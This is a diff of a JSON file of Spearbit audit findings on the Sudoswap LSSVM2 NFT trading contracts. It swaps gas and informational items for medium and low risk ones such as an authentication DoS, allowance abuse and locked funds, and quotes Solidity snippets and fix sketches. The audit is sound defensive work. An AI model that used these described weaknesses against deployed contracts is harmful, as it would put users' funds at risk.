Manifold does have a getAdmins() interface which is not considered in authAllowedForToken, and it is not certain that the others don't.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Gas Optimization LSSVMPairERC1155.sol, LSSVMPairETH.sol, LSSVMPairERC721.sol," + "Severity: Medium Risk" ] }, { - "title": "Not tightly packing struct variables consumes extra storage slots and gas", + "title": "Misdirected transfers to invalid pair variants or non-pair recipients may lead to loss/lock of NFTs/tokens", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Gas efficiency can be achieved by tightly packing structs. Struct variables are stored in 32 bytes each and so you can group smaller types to occupy less storage.", + "body": "Functions depositNFTs() and depositERC20() allow deposits of ERC721 NFTs and ERC20 tokens after pair creation. While they check that the deposit recipient is a valid pair/variant for emitting an event, the deposit transfers happen prior to the check and without the same validation; a safer ordering is sketched below. With dual home tokens (see weird-erc20), the event emission could be skipped when the \"other\" token is transferred. Also, the isPair() check in depositNFTs() does not specifically check if the pair variant is ERC721_ERC20 or ERC721_ETH. 
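A minimal sketch of the validate-before-transfer ordering (the signature and NFTDeposit event name are assumptions based on the report's description):
function depositNFTs(IERC721 nft, uint256[] calldata ids, address recipient) external {
    // validate the recipient first so misdirected deposits revert instead of transferring
    require(
        isPair(recipient, ILSSVMPairFactoryLike.PairVariant.ERC721_ETH)
            || isPair(recipient, ILSSVMPairFactoryLike.PairVariant.ERC721_ERC20),
        \"Not an ERC721 pair\"
    );
    for (uint256 i; i < ids.length; ++i) {
        nft.transferFrom(msg.sender, recipient, ids[i]);
    }
    emit NFTDeposit(recipient); // event name assumed
}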
This allows accidentally misdirected deposits to invalid pair variants or non-pair recipients, leading to loss/lock of NFTs/tokens.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Gas Optimization" + "Severity: Medium Risk" ] }, { - "title": "Variables that are redeclared in each loop iteration can be declared once outside the loop", + "title": "authAllowedForToken() returns prematurely in certain scenarios causing an authentication DoS", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "price is redefined in each iteration of the loop and right after declaration is set to a new value. for (uint256 i; i < numNFTs; i++) { uint256 price; (, spotPrice, delta, price,,) = pair.bondingCurve().getBuyInfo(spotPrice, delta, 1, fee, pair.factory().protocolFeeMultiplier()); ... }", + "body": "Tokens listed on Nifty or Foundation (therefore returning a valid niftyRegistry or foundationTreasury) where the proposedAuthAddress is not a valid Nifty sender or a valid Foundation Treasury admin will cause an authentication DoS if the token is also listed on Digitalax or ArtBlocks and the proposedAuthAddress has admin roles on those platforms. This happens because the return values of valid and isAdmin for isValidNiftySender(proposedAuthAddress) and isAdmin(proposedAuthAddress) respectively are returned as-is, instead of returning only if/when they are true but continuing the checks for authorization otherwise (if/when they are false) on Digitalax and ArtBlocks. toggleSettingsForCollection and reclaimPair (which utilize authAllowedForToken) would incorrectly fail for a valid proposedAuthAddress in such scenarios.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Gas Optimization" + "Severity: Medium Risk" ] }, { - "title": "Caller of swapTokenForSpecificNFTs() must be able to receive ETH", + "title": "Partial fills don't recycle ETH", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The function _refundTokenToSender() sends ETH back to the caller. If this caller is a contract then it might not be able to receive ETH. If it can't receive ETH then the transaction will revert. function _refundTokenToSender(uint256 inputAmount) internal override { // Give excess ETH back to caller if (msg.value > inputAmount) { payable(msg.sender).safeTransferETH(msg.value - inputAmount); } }", + "body": "After several fixes are applied, the following code exists. If the sell can be filled completely, ETH is recycled; however, when a partial fill is applied, ETH is not recycled. This might lead to a revert and would require doing the trade again, which costs extra gas, and the trading conditions might be worse by then. function swap(Order calldata swapOrder) external payable returns (uint256[] memory results) { ... // Go through each sell order ... if (pairSpotPrice == order.expectedSpotPrice) { // If the pair is an ETH pair and we opt into recycling ETH, add the output to our total accrued if (order.isETHSell && swapOrder.recycleETH) { ... ... order.pair.swapNFTsForToken(... , payable(address(this)), ... ); } // Otherwise, all tokens or ETH received from the sale go to the token recipient else { ... order.pair.swapNFTsForToken(..., swapOrder.tokenRecipient, ... ); } } // Otherwise we need to do some partial fill calculations first else { ... ... order.pair.swapNFTsForToken(..., swapOrder.tokenRecipient, ... 
); // ETH not recycled } // Go through each buy order ... }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "order.doPropertyCheck could be replaced by the pair's propertyChecker()", + "title": "Wrong allowances can be abused by the owner", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The field+check for a separate order.doPropertyCheck in struct SellOrder is unnecessary because this can already be checked via the pair's propertyChecker() without relying on the user to explicitly specify it in their order.", + "body": "The function call() allows transferring tokens and NFTs that have an allowance set to the pair. Normally, allowances should be given to the router, but they could be accidentally given to the pair. Although call() is protected by onlyOwner, the pair is created permissionlessly and so the owner could be anyone.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "_payProtocolFeeFromPair() could be replaced with _sendTokenOutput()", + "title": "Malicious router mitigation may break for deflationary tokens", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Both ERC20 and ETH versions of _payProtocolFeeFromPair() and _sendTokenOutput() are identical in their parameters and logic.", + "body": "The ERC20 _pullTokenInputAndPayProtocolFee() for routers has a mitigation for malicious routers by checking if the before-after token balance difference is equal to the transferred amount. This will break for any ERC20 pairs with fee-on-transfer deflationary tokens (see weird-erc20). Note that there has been a real-world exploit related to this with a Balancer pool and STA deflationary tokens.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "False positive in test_getSellInfoWithoutFee() when delta == FixedPointMathLib.WAD due to wrong implementation", + "title": "Inconsistent royalty threshold checks allow some royalties to be equal to sale amount", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "In test_getSellInfoWithoutFee, delta is not validated via validateDelta, which causes a false positive in the current test when delta == FixedPointMathLib.WAD. This can be tried with the following proof of concept: // SPDX-License-Identifier: MIT pragma solidity ^0.8.15; import {FixedPointMathLib} from \"https://raw.githubusercontent.com/transmissions11/solmate/main/src/utils/FixedPointMathLib.sol\"; contract test{ using FixedPointMathLib for uint256; constructor() { uint256 delta = FixedPointMathLib.WAD; uint256 invDelta = FixedPointMathLib.WAD.divWadDown(delta); uint outputValue = delta.divWadDown(FixedPointMathLib.WAD - invDelta); // revert } }", + "body": "Threshold checks on royalty amounts are implemented both in _getRoyaltyAndSpec() and its caller _calculateRoyalties(). While _calculateRoyalties() implements an inclusive check with require(saleAmount >= royaltyTotal, \"Royalty exceeds sale price\"); (allowing the royalty to be equal to the sale amount), the different checks in _getRoyaltyAndSpec() on the returned amounts, or in the calculations on bps in _computeAmounts(), exclude the saleAmount, forcing the royalty to be less than the saleAmount. 
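The two check styles side by side (a condensed paraphrase, not verbatim code):
// caller-side check in _calculateRoyalties(): inclusive, royaltyTotal == saleAmount passes
require(saleAmount >= royaltyTotal, \"Royalty exceeds sale price\");
// per-spec checks (where present): exclusive, a royalty equal to saleAmount is rejected
require(royaltyAmount < saleAmount);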
However, only Known Origin and SuperRare are missing a similar threshold check in _getRoyaltyAndSpec(). This allows only Known Origin and SuperRare royalties to be equal to the sale amount, as enforced by the check in _calculateRoyalties().", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "Checks-Effects-Interactions pattern not used in swapNFTsForToken()", + "title": "Numerical difference between getNFTQuoteForBuyOrderWithPartialFill() and _findMaxFillableAmtForBuy() may lead to precision errors", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "It is a defensive programming pattern to first take NFTs and then send the tokens (i.e. the Checks-Effects-Interactions pattern). function swapNFTsForToken(...) ... { ... _sendTokenOutput(tokenRecipient, outputAmount); ... _sendTokenOutput(royaltyRecipients[i], royaltyAmounts[i]); ... _payProtocolFeeFromPair(_factory, protocolFee); ... _takeNFTsFromSender(...); ... }", + "body": "There is a slight numerical instability between the partial fill calculation and the initial client-side calculation (i.e. getNFTQuoteForSellOrderWithPartialFill() / getNFTQuoteForBuyOrderWithPartialFill() versus _findMaxFillableAmtForBuy()). This is because getNFTQuoteForSellOrderWithPartialFill() first assumes a buy of 1 item, updates spotPrice/delta, and then gets the next subsequent quote to buy the next item, whereas _findMaxFillableAmtForBuy() assumes buying multiple items at once. For e.g. ExponentialCurve.sol and XykCurve.sol this can lead to minor numerical precision errors. function getNFTQuoteForBuyOrderWithPartialFill(LSSVMPair pair, uint256 numNFTs) external view returns (uint256[] memory) { ... for (uint256 i; i < numNFTs; i++) { ... (, spotPrice, delta, price,,) = pair.bondingCurve().getBuyInfo(spotPrice, delta, 1, fee, ...); ... } } function getNFTQuoteForSellOrderWithPartialFill(LSSVMPair pair, uint256 numNFTs) external view returns (uint256[] memory) { ... for (uint256 i; i < numNFTs; i++) { ... (, spotPrice, delta, price,,) = pair.bondingCurve().getSellInfo(spotPrice, delta, 1, fee, ... ); ... } ... } function _findMaxFillableAmtForBuy(LSSVMPair pair, uint256 maxNumNFTs, uint256[] memory maxCostPerNumNFTs, uint256 ... while (start <= end) { ... (...) = pair.bondingCurve().getBuyInfo(spotPrice, delta, (start + end)/2, feeMultiplier, protocolFeeMultiplier); ... } }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "Two versions of withdrawERC721() and withdrawERC1155()", + "title": "Differences with Manifold version of RoyaltyEngine may cause unexpected behavior", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "There are two versions of withdrawERC721() and withdrawERC1155() with slightly different implementations. This is more difficult to maintain.", + "body": "Sudoswap has forked RoyaltyEngine from Manifold; however, there are some differences. The Manifold version of _getRoyaltyAndSpec() also queries getRecipients(), while the Sudoswap version doesn't. This means Sudoswap will not spread the royalties over all recipients. function _getRoyaltyAndSpec(...) // Manifold ... try IEIP2981(royaltyAddress).royaltyInfo(tokenId, value) returns (address recipient, uint256 amount) { ... 
try IRoyaltySplitter(royaltyAddress).getRecipients() returns (Recipient[] memory splitRecipients) { ... } } } function _getRoyaltyAndSpec(...) // Sudoswap ... try IEIP2981(royaltyAddress).royaltyInfo(tokenId, value) returns (address recipient, uint256 amount) { ... } ... } } The Manifold version of getRoyalty() has an extra try/catch compared to the Sudoswap version. This protects against reverts in the cached functions. Note: adding an extra try/catch requires the function _getRoyaltyAndSpec() to be external. function getRoyalty(address tokenAddress, uint256 tokenId, uint256 value) ... { // Manifold ... try this._getRoyaltyAndSpec{gas: 100000}(tokenAddress, tokenId, value) returns ( ... ) ... } function getRoyalty(address tokenAddress, uint256 tokenId, uint256 value) ... { // Sudoswap ... ... (...) = _getRoyaltyAndSpec(tokenAddress, tokenId, value); }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "Missing sanity/threshold checks may cause undesirable behavior and/or waste of gas", + "title": "Swaps with property-checked ERC1155 sell orders in VeryFastRouter will fail", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Numerical user inputs and external call returns that are subject to thresholds due to the contract's logic should be checked for sanity to avoid undesirable behavior or reverts in later logic, and to avoid wasting unnecessary gas in the process.", + "body": "Any batch of swaps which has a property-checked sell order for ERC1155 will revert. Given that property checks are supported only on ERC721 pairs and not on ERC1155 pairs, swap sell orders for ERC1155 in VeryFastRouter will fail if order.doPropertyCheck is accidentally set, because the logic thereafter assumes it is an ERC721 order.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "Deviation from standard/uniform naming convention affects readability", + "title": "changeSpotPriceAndDelta() reverts when there is enough liquidity to support 1 sell", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Following standard/uniform naming conventions is essential to make a codebase easy to read and understand.", + "body": "changeSpotPriceAndDelta() reverts when there is enough liquidity to support 1 sell because it uses > instead of >= in the check pairBalance > newPriceToSellToPair.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "Function _getRoyaltyAndSpec() contains code duplication which affects maintainability", + "title": "Lack of support for per-token royalties may lead to incorrect royalty payments", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The function _getRoyaltyAndSpec() is rather long and contains code duplication. This makes it difficult to maintain. function _getRoyaltyAndSpec(address tokenAddress, uint256 tokenId, uint256 value) ... if (spec <= NOT_CONFIGURED && spec > NONE) { try IArtBlocksOverride(royaltyAddress).getRoyalties(tokenAddress, tokenId) returns (...) 
{ // Support Art Blocks override require(recipients_.length == bps.length); return (recipients_, _computeAmounts(value, bps), ARTBLOCKS, royaltyAddress, addToCache); } catch {} ... } else { // Spec exists, just execute the appropriate one ... ... if (spec == ARTBLOCKS) { // Art Blocks spec uint256[] memory bps; (recipients, bps) = IArtBlocksOverride(royaltyAddress).getRoyalties(tokenAddress, tokenId); require(recipients.length == bps.length); return (recipients, _computeAmounts(value, bps), spec, royaltyAddress, addToCache); } else ... }", + "body": "The protocol currently lacks complete support for per-token royalties; it assumes that all NFTs in a pair have the same royalty and so considers the first assetId to determine royalties for all NFT token ids in the pair. If not, the pair owner is expected to make a new pair for NFTs that have different royalties. A pair with NFTs that have different royalties will lead to incorrect royalty payments for the different NFTs.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "getSellInfo always adds 1 rather than rounding which leads to last item being sold at 0", + "title": "Missing additional safety for multicall may lead to lost ETH in future", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Based on the comment // We calculate how many items we can sell into the linear curve until the spot price reaches 0, rounding up. In cases where delta == spotPrice && numItems > 1, the last item would be sold at 0: delta = 100; spotPrice = 100; numItems = 2; uint256 totalPriceDecrease = delta * numItems = 200; Therefore the check if (spotPrice < totalPriceDecrease) succeeds. Later it is calculated: uint256 numItemsTillZeroPrice = spotPrice / delta + 1; That would result in 2, while the division was an exact 1; so in the case where spotPrice == delta the value is not rounded up but always increased by 1.", + "body": "If the function multicall() were payable, then multiple delegated-to functions could use the same msg.value, which could result in losing ETH from the pair. A future upgrade of Solidity might change the default setting for functions to payable. See Solidity issue #12539. function multicall(bytes[] calldata calls, bool revertOnFail) external onlyOwner { for (uint256 i; i < calls.length;) { (bool success, bytes memory result) = address(this).delegatecall(calls[i]); ... } }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "Natspec for robustSwapETHForSpecificNFTs() is slightly misleading", + "title": "Missing zero-address check may allow re-initialization of pairs", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The function robustSwapETHForSpecificNFTs() has this comment: * @dev We assume msg.value >= sum of values in maxCostPerPair This doesn't have to be the case. The transaction just reverts if msg.value isn't sufficient.", + "body": "LSSVMPair.initialize() guards against re-initialization with require(owner() == address(0), \"Initialized\");. However, without a zero-address check on _owner, this can be true even later if the pair is initialized accidentally with address(0) instead of msg.sender. This is because __Ownable_init in OwnableWithTransferCallback does not disallow address(0), unlike transferOwnership. 
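A minimal hardened guard might look as follows (a sketch; __Ownable_init is quoted later in this report, and the zero-address check is the addition):
function __Ownable_init(address initialOwner) internal {
    // rejecting address(0) keeps owner() == address(0) meaning \"uninitialized\"
    require(initialOwner != address(0), \"Zero owner\");
    _owner = initialOwner;
}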
This is, however, not the case with the current implementation, where LSSVMPair.initialize() is called from LSSVMPairFactory with msg.sender as the argument for _owner; otherwise, LSSVMPair.initialize() could be called multiple times.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "Two copies of pairTransferERC20From(), pairTransferNFTFrom() and pairTransferERC1155From() are present", + "title": "Trade pair owners are allowed to change asset recipient address when it has no impact", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Both contracts LSSVMRouter and VeryFastRouter contain the functions pairTransferERC20From(), pairTransferNFTFrom() and pairTransferERC1155From(). This is more difficult to maintain as both copies have to stay in sync.", + "body": "Trade pair owners are allowed to change their asset recipient address using changeAssetRecipient(), while getAssetRecipient() always returns the pair address itself for Trade pairs, as expected. Trade pair owners mistakenly assume that they can change their asset recipient address using changeAssetRecipient() because they are allowed to do so successfully, but may be surprised to see that it has no effect. They may expect assets at the new address, but that will not be the case.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "Not using error strings in require statements obfuscates monitoring", + "title": "NFT projects with custom settings and multiple royalty receivers will receive royalty only for first receiver", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "require statements should include meaningful error messages to help with monitoring the system.", + "body": "_calculateRoyalties() and its view equivalent only consider the first royalty receiver when custom settings are enabled. If non-ERC-2981-compliant NFT projects on Manifold/ArtBlocks or other platforms that support multiple royalty receivers come up with custom settings that pair owners subscribe to, then all the royalty will go to the first recipient. Other receivers will not receive any royalties.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "prices and balances in the curves may not be updated after calls to depositNFTs() and depositERC20()", + "title": "Missing non-zero checks allow event emission spamming", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The functions depositNFTs() and depositERC20() allow anyone to add NFTs and/or ERC20 to a pair but do not update the prices and balances in the curves. And if they were to do so, then the functions might be abused to update token prices with irrelevant tokens and NFTs. However, it is not clear if/how the prices and balances in the curves are updated to reflect this. The owner can't fully rely on emits.", + "body": "Functions depositNFTs() and depositERC20() are meant to allow deposits into the pair post-creation. However, they do not check if non-zero NFTs or tokens are being deposited. The event emission only checks if the pair recipient is valid. 
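A sketch of the missing guards (placement and revert messages are assumptions):
require(ids.length != 0, \"Empty NFT deposit\"); // in depositNFTs()
require(amount != 0, \"Zero token deposit\"); // in depositERC20()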
Given their permissionless nature, this allows anyone to grief the system with zero NFT/token deposits, causing the emission of events which may hinder indexing/monitoring systems.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "Functions enableSettingsForPair() and disableSettingsForPair() can be simplified", + "title": "Missing sanity zero-address checks may lead to undesired behavior or lock of funds", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The functions enableSettingsForPair() and disableSettingsForPair() define a temporary variable pair. This could also be used earlier in the code to simplify the code. function enableSettingsForPair(address settings, address pairAddress) public { require(isPair(pairAddress, LSSVMPair(pairAddress).pairVariant()), \"Invalid pair address\"); LSSVMPair pair = LSSVMPair(pairAddress); ... } function disableSettingsForPair(address settings, address pairAddress) public { require(isPair(pairAddress, LSSVMPair(pairAddress).pairVariant()), \"Invalid pair address\"); ... LSSVMPair pair = LSSVMPair(pairAddress); ... }", + "body": "Certain logic requires zero-address checks to avoid undesired behavior or lock of funds. For example, in Splitter.sol#L34 users can permanently lock ETH by mistakenly using safeTransferETH with a default/zero-address value.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "Design asymmetry decreases code readability", + "title": "Legacy NFTs are not compatible with protocol pairs", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The function _calculateBuyInfoAndUpdatePoolParams() performs a check on maxExpectedTokenInput inside its function. On the other hand, the comparable check for _calculateSellInfoAndUpdatePoolParams() is done outside of the function: function _swapNFTsForToken(...) ... { // LSSVMPairERC721.sol ... (protocolFee, outputAmount) = _calculateSellInfoAndUpdatePoolParams(...) require(outputAmount >= minExpectedTokenOutput, \"Out too few tokens\"); ... } The asymmetry in the design of these functions affects code readability and may confuse the reader.", + "body": "Pairs support ERC721 and ERC1155 NFTs. However, users of NFT marketplaces may also expect to find OG NFTs such as Cryptopunks, Etherrocks or Cryptokitties, which do not adhere to these ERC standards. For example, Cryptopunks have their own internal marketplace which allows users to trade their NFTs with other users. Given that Cryptopunks do not adhere to the ERC721 standard, trades will always fail when the protocol attempts to transfer them. 
Even with wrapped versions of these NFTs, people who aren't aware of them or who hold the original version won't be able to trade them in a pair.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "Providing the same _nftID multiple times will increase numPairNFTsWithdrawn multiple times to potentially cause confusion", + "title": "Unnecessary payable specifier for functions may allow ETH to be sent and locked/lost", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "If one accidentally (or intentionally) supplies the same id == _nftID multiple times in the array ids[], then numPairNFTsWithdrawn is increased multiple times. Assuming this value is used via indexing for the user interface, this could be misleading.", + "body": "Functions LSSVMRouter.robustSwapERC20ForSpecificNFTsAndNFTsToToken() and LSSVMPair.initialize(), which do not expect to receive and process Ether, have the payable specifier, which allows interacting users to accidentally send them Ether which will get locked/lost.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "Dual interface NFTs may cause unexpected behavior if not considered in future", + "title": "Obsolete Splitter contract may lead to locked ETH/tokens", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Some NFTs support both the ERC721 and the ERC1155 standard, for example NFTs of the Sandbox project. Additionally, the internal layout of the parameters of cloneETHPair and cloneERC1155ETHPair are very similar: | cloneETHPair | cloneERC1155ETHPair | | --- | --- | | mstore(add(ptr, 0x3e), shl(0x60, factory)) | mstore(add(ptr, 0x3e), shl(0x60, factory)) | | mstore(add(ptr, 0x52), shl(0x60, bondingCurve)) | mstore(add(ptr, 0x52), shl(0x60, bondingCurve)) | | mstore(add(ptr, 0x66), shl(0x60, nft)) | mstore(add(ptr, 0x66), shl(0x60, nft)) | | mstore8(add(ptr, 0x7a), poolType) | mstore8(add(ptr, 0x7a), poolType) | | mstore(add(ptr, 0x7b), shl(0x60, propertyChecker)) | mstore(add(ptr, 0x7b), nftId) | In case there is a specific function that only works on ERC721, and that can be applied to ERC1155 pairs, in combination with an NFT that supports both standards, an unexpected situation could occur. Currently, this is not the case, but that might occur in future iterations of the code.", + "body": "After a pair has been reclaimed via reclaimPair(), pairInfos[] will be emptied and getPrevFeeRecipientForPair() will return 0. The obsolete Splitter will however remain present, but any ETH or tokens that are sent to the contract can't be retrieved via withdrawETH() and withdrawTokens(). This is because getPrevFeeRecipientForPair() is 0 and the tokens would be sent to address(0). It is unlikely, though, that ETH or tokens are sent to the Splitter contract as it is not used anymore. function withdrawETH(uint256 ethAmount) public { ISettings parentSettings = ISettings(getParentSettings()); ... payable(parentSettings.getPrevFeeRecipientForPair(getPairAddressForSplitter())).safeTransferETH(... ); } function withdrawTokens(ERC20 token, uint256 tokenAmount) public { ISettings parentSettings = ISettings(getParentSettings()); ... token.safeTransfer(parentSettings.getPrevFeeRecipientForPair(getPairAddressForSplitter()), ... 
); } function getPrevFeeRecipientForPair(address pairAddress) public view returns (address) { return pairInfos[pairAddress].prevFeeRecipient; } function reclaimPair(address pairAddress) public { ... delete pairInfos[pairAddress]; ... }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "Missing event emission in multicall", + "title": "Divisions in getBuyInfo() and getSellInfo() may be rounded down to 0", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Not emitting events on success/failure of calls within a multicall makes debugging failed multicalls difficult. There are several actions that should always emit events for transparency, such as ownership change, transfer of ether/tokens etc. In the case of a multicall function, it is recommended to emit an event for succeeding (or failing) calls.", + "body": "In extreme cases (e.g. tokens with few decimals, see this example), divisions in getBuyInfo() and getSellInfo() may be rounded down to 0. This means inputValueWithoutFee and/or outputValueWithoutFee may be 0. function getBuyInfo(..., uint256 numItems, ... ) ... { ... uint256 inputValueWithoutFee = (numItems * tokenBalance) / (nftBalance - numItems); ... } function getSellInfo(..., uint256 numItems, ... ) ... { ... uint256 outputValueWithoutFee = (numItems * tokenBalance) / (nftBalance + numItems); ... }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "Returning only one type of fee from getBuyNFTQuote(), getSellNFTQuote() and getSellNFTQuoteWithRoyalties() could be misleading", + "title": "Last NFT in an XykCurve cannot be sold", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The functions getBuyNFTQuote(), getSellNFTQuote() and getSellNFTQuoteWithRoyalties() return a protocolFee variable. There are also other fees like tradeFee and royaltyTotal that are not returned from these functions. Given that these functions might be called from the outside, it is not clear why other fees are not included here.", + "body": "The function getBuyInfo() of XykCurve enforces numItems < nftBalance, which means the last NFT can never be sold. One potential solution, as suggested by the Sudoswap team, is to set delta (= nftBalance) one higher than the real amount of NFTs. This could cause problems in other parts of the code. For example, once only one NFT is left, if we try to use changeSpotPriceAndDelta(), getBuyNFTQuote(1) will error and thus the prices (tokenBalance) and delta (nftBalance) can't be changed anymore. If nftBalance is set to one higher, then it won't satisfy pair.nft().balanceOf(pairAddress) >= 1. contract XykCurve ... { function getBuyInfo(..., uint256 numItems, ... ) ... { ... uint256 tokenBalance = spotPrice; uint256 nftBalance = delta; ... // If numItems is too large, we will get divide by zero error if (numItems >= nftBalance) { return (Error.INVALID_NUMITEMS, 0, 0, 0, 0, 0); } ... } } function changeSpotPriceAndDelta(...) ... { ... (,,, uint256 priceToBuyFromPair,) = pair.getBuyNFTQuote(1); ... if (... && pair.nft().balanceOf(pairAddress) >= 1) { pair.changeSpotPrice(newSpotPrice); pair.changeDelta(newDelta); return; } ... } function getBuyNFTQuote(uint256 numNFTs) ... { (error, ...) 
= bondingCurve().getBuyInfo(..., numNFTs, ...); }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "Two ways to query the assetRecipient could be confusing", + "title": "Allowing different ERC20 tokens in LSSVMRouter swaps will affect accounting and lead to undefined behavior", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The contract LSSVMPair has two ways to query the assetRecipient: one via the getter assetRecipient() and one via getAssetRecipient(). Both give different results and generally getAssetRecipient() should be used. Having two ways could be confusing. address payable public assetRecipient; function getAssetRecipient() public view returns (address payable _assetRecipient) { ... // logic to determine _assetRecipient }", + "body": "As commented: \"Note: All ERC20 swaps assume that a single ERC20 token is used for all the pairs involved. * Swapping using multiple tokens in the same transaction is possible, but the slippage checks * & the return values will be meaningless and may lead to undefined behavior.\" This assumption may be risky if users end up mistakenly using different ERC20 tokens in different swaps. Summing up their inputAmount and remainingValue will not be meaningful and will lead to accounting errors and undefined behavior (as noted).", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "Functions expecting NFT deposits can validate parameters for sanity and optimization", + "title": "Missing array length equality checks may lead to incorrect or undefined behavior", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Functions expecting NFT deposits in their typical flows can validate parameters for sanity and optimization.", + "body": "Functions taking two array-type parameters and not checking that their lengths are equal may lead to incorrect or undefined behavior when accidentally passing arrays of unequal lengths.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "Functions expecting ETH deposits can check msg.value for sanity and optimization", + "title": "Owners may have funds locked if newOwner is EOA in transferOwnership()", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Functions that expect ETH deposits in their typical flows can check for non-zero values of msg.value for sanity and optimization.", + "body": "In transferOwnership(), if newOwner has zero code.length (i.e. an EOA), newOwner.isContract() will be false and therefore the if block will be skipped. As the function is payable, any msg.value from the call would get locked in the contract. Note: ERC20 pairs and StandardSettings don't have a method to recover ETH.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "LSSVMPairs can be simplified", + "title": "Use of transferFrom may lead to NFTs getting locked forever", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "At the different LSSVMPairs, PairVariant and IMMUTABLE_PARAMS_LENGTH can be passed to LSSVMPair, which could store them as immutable. 
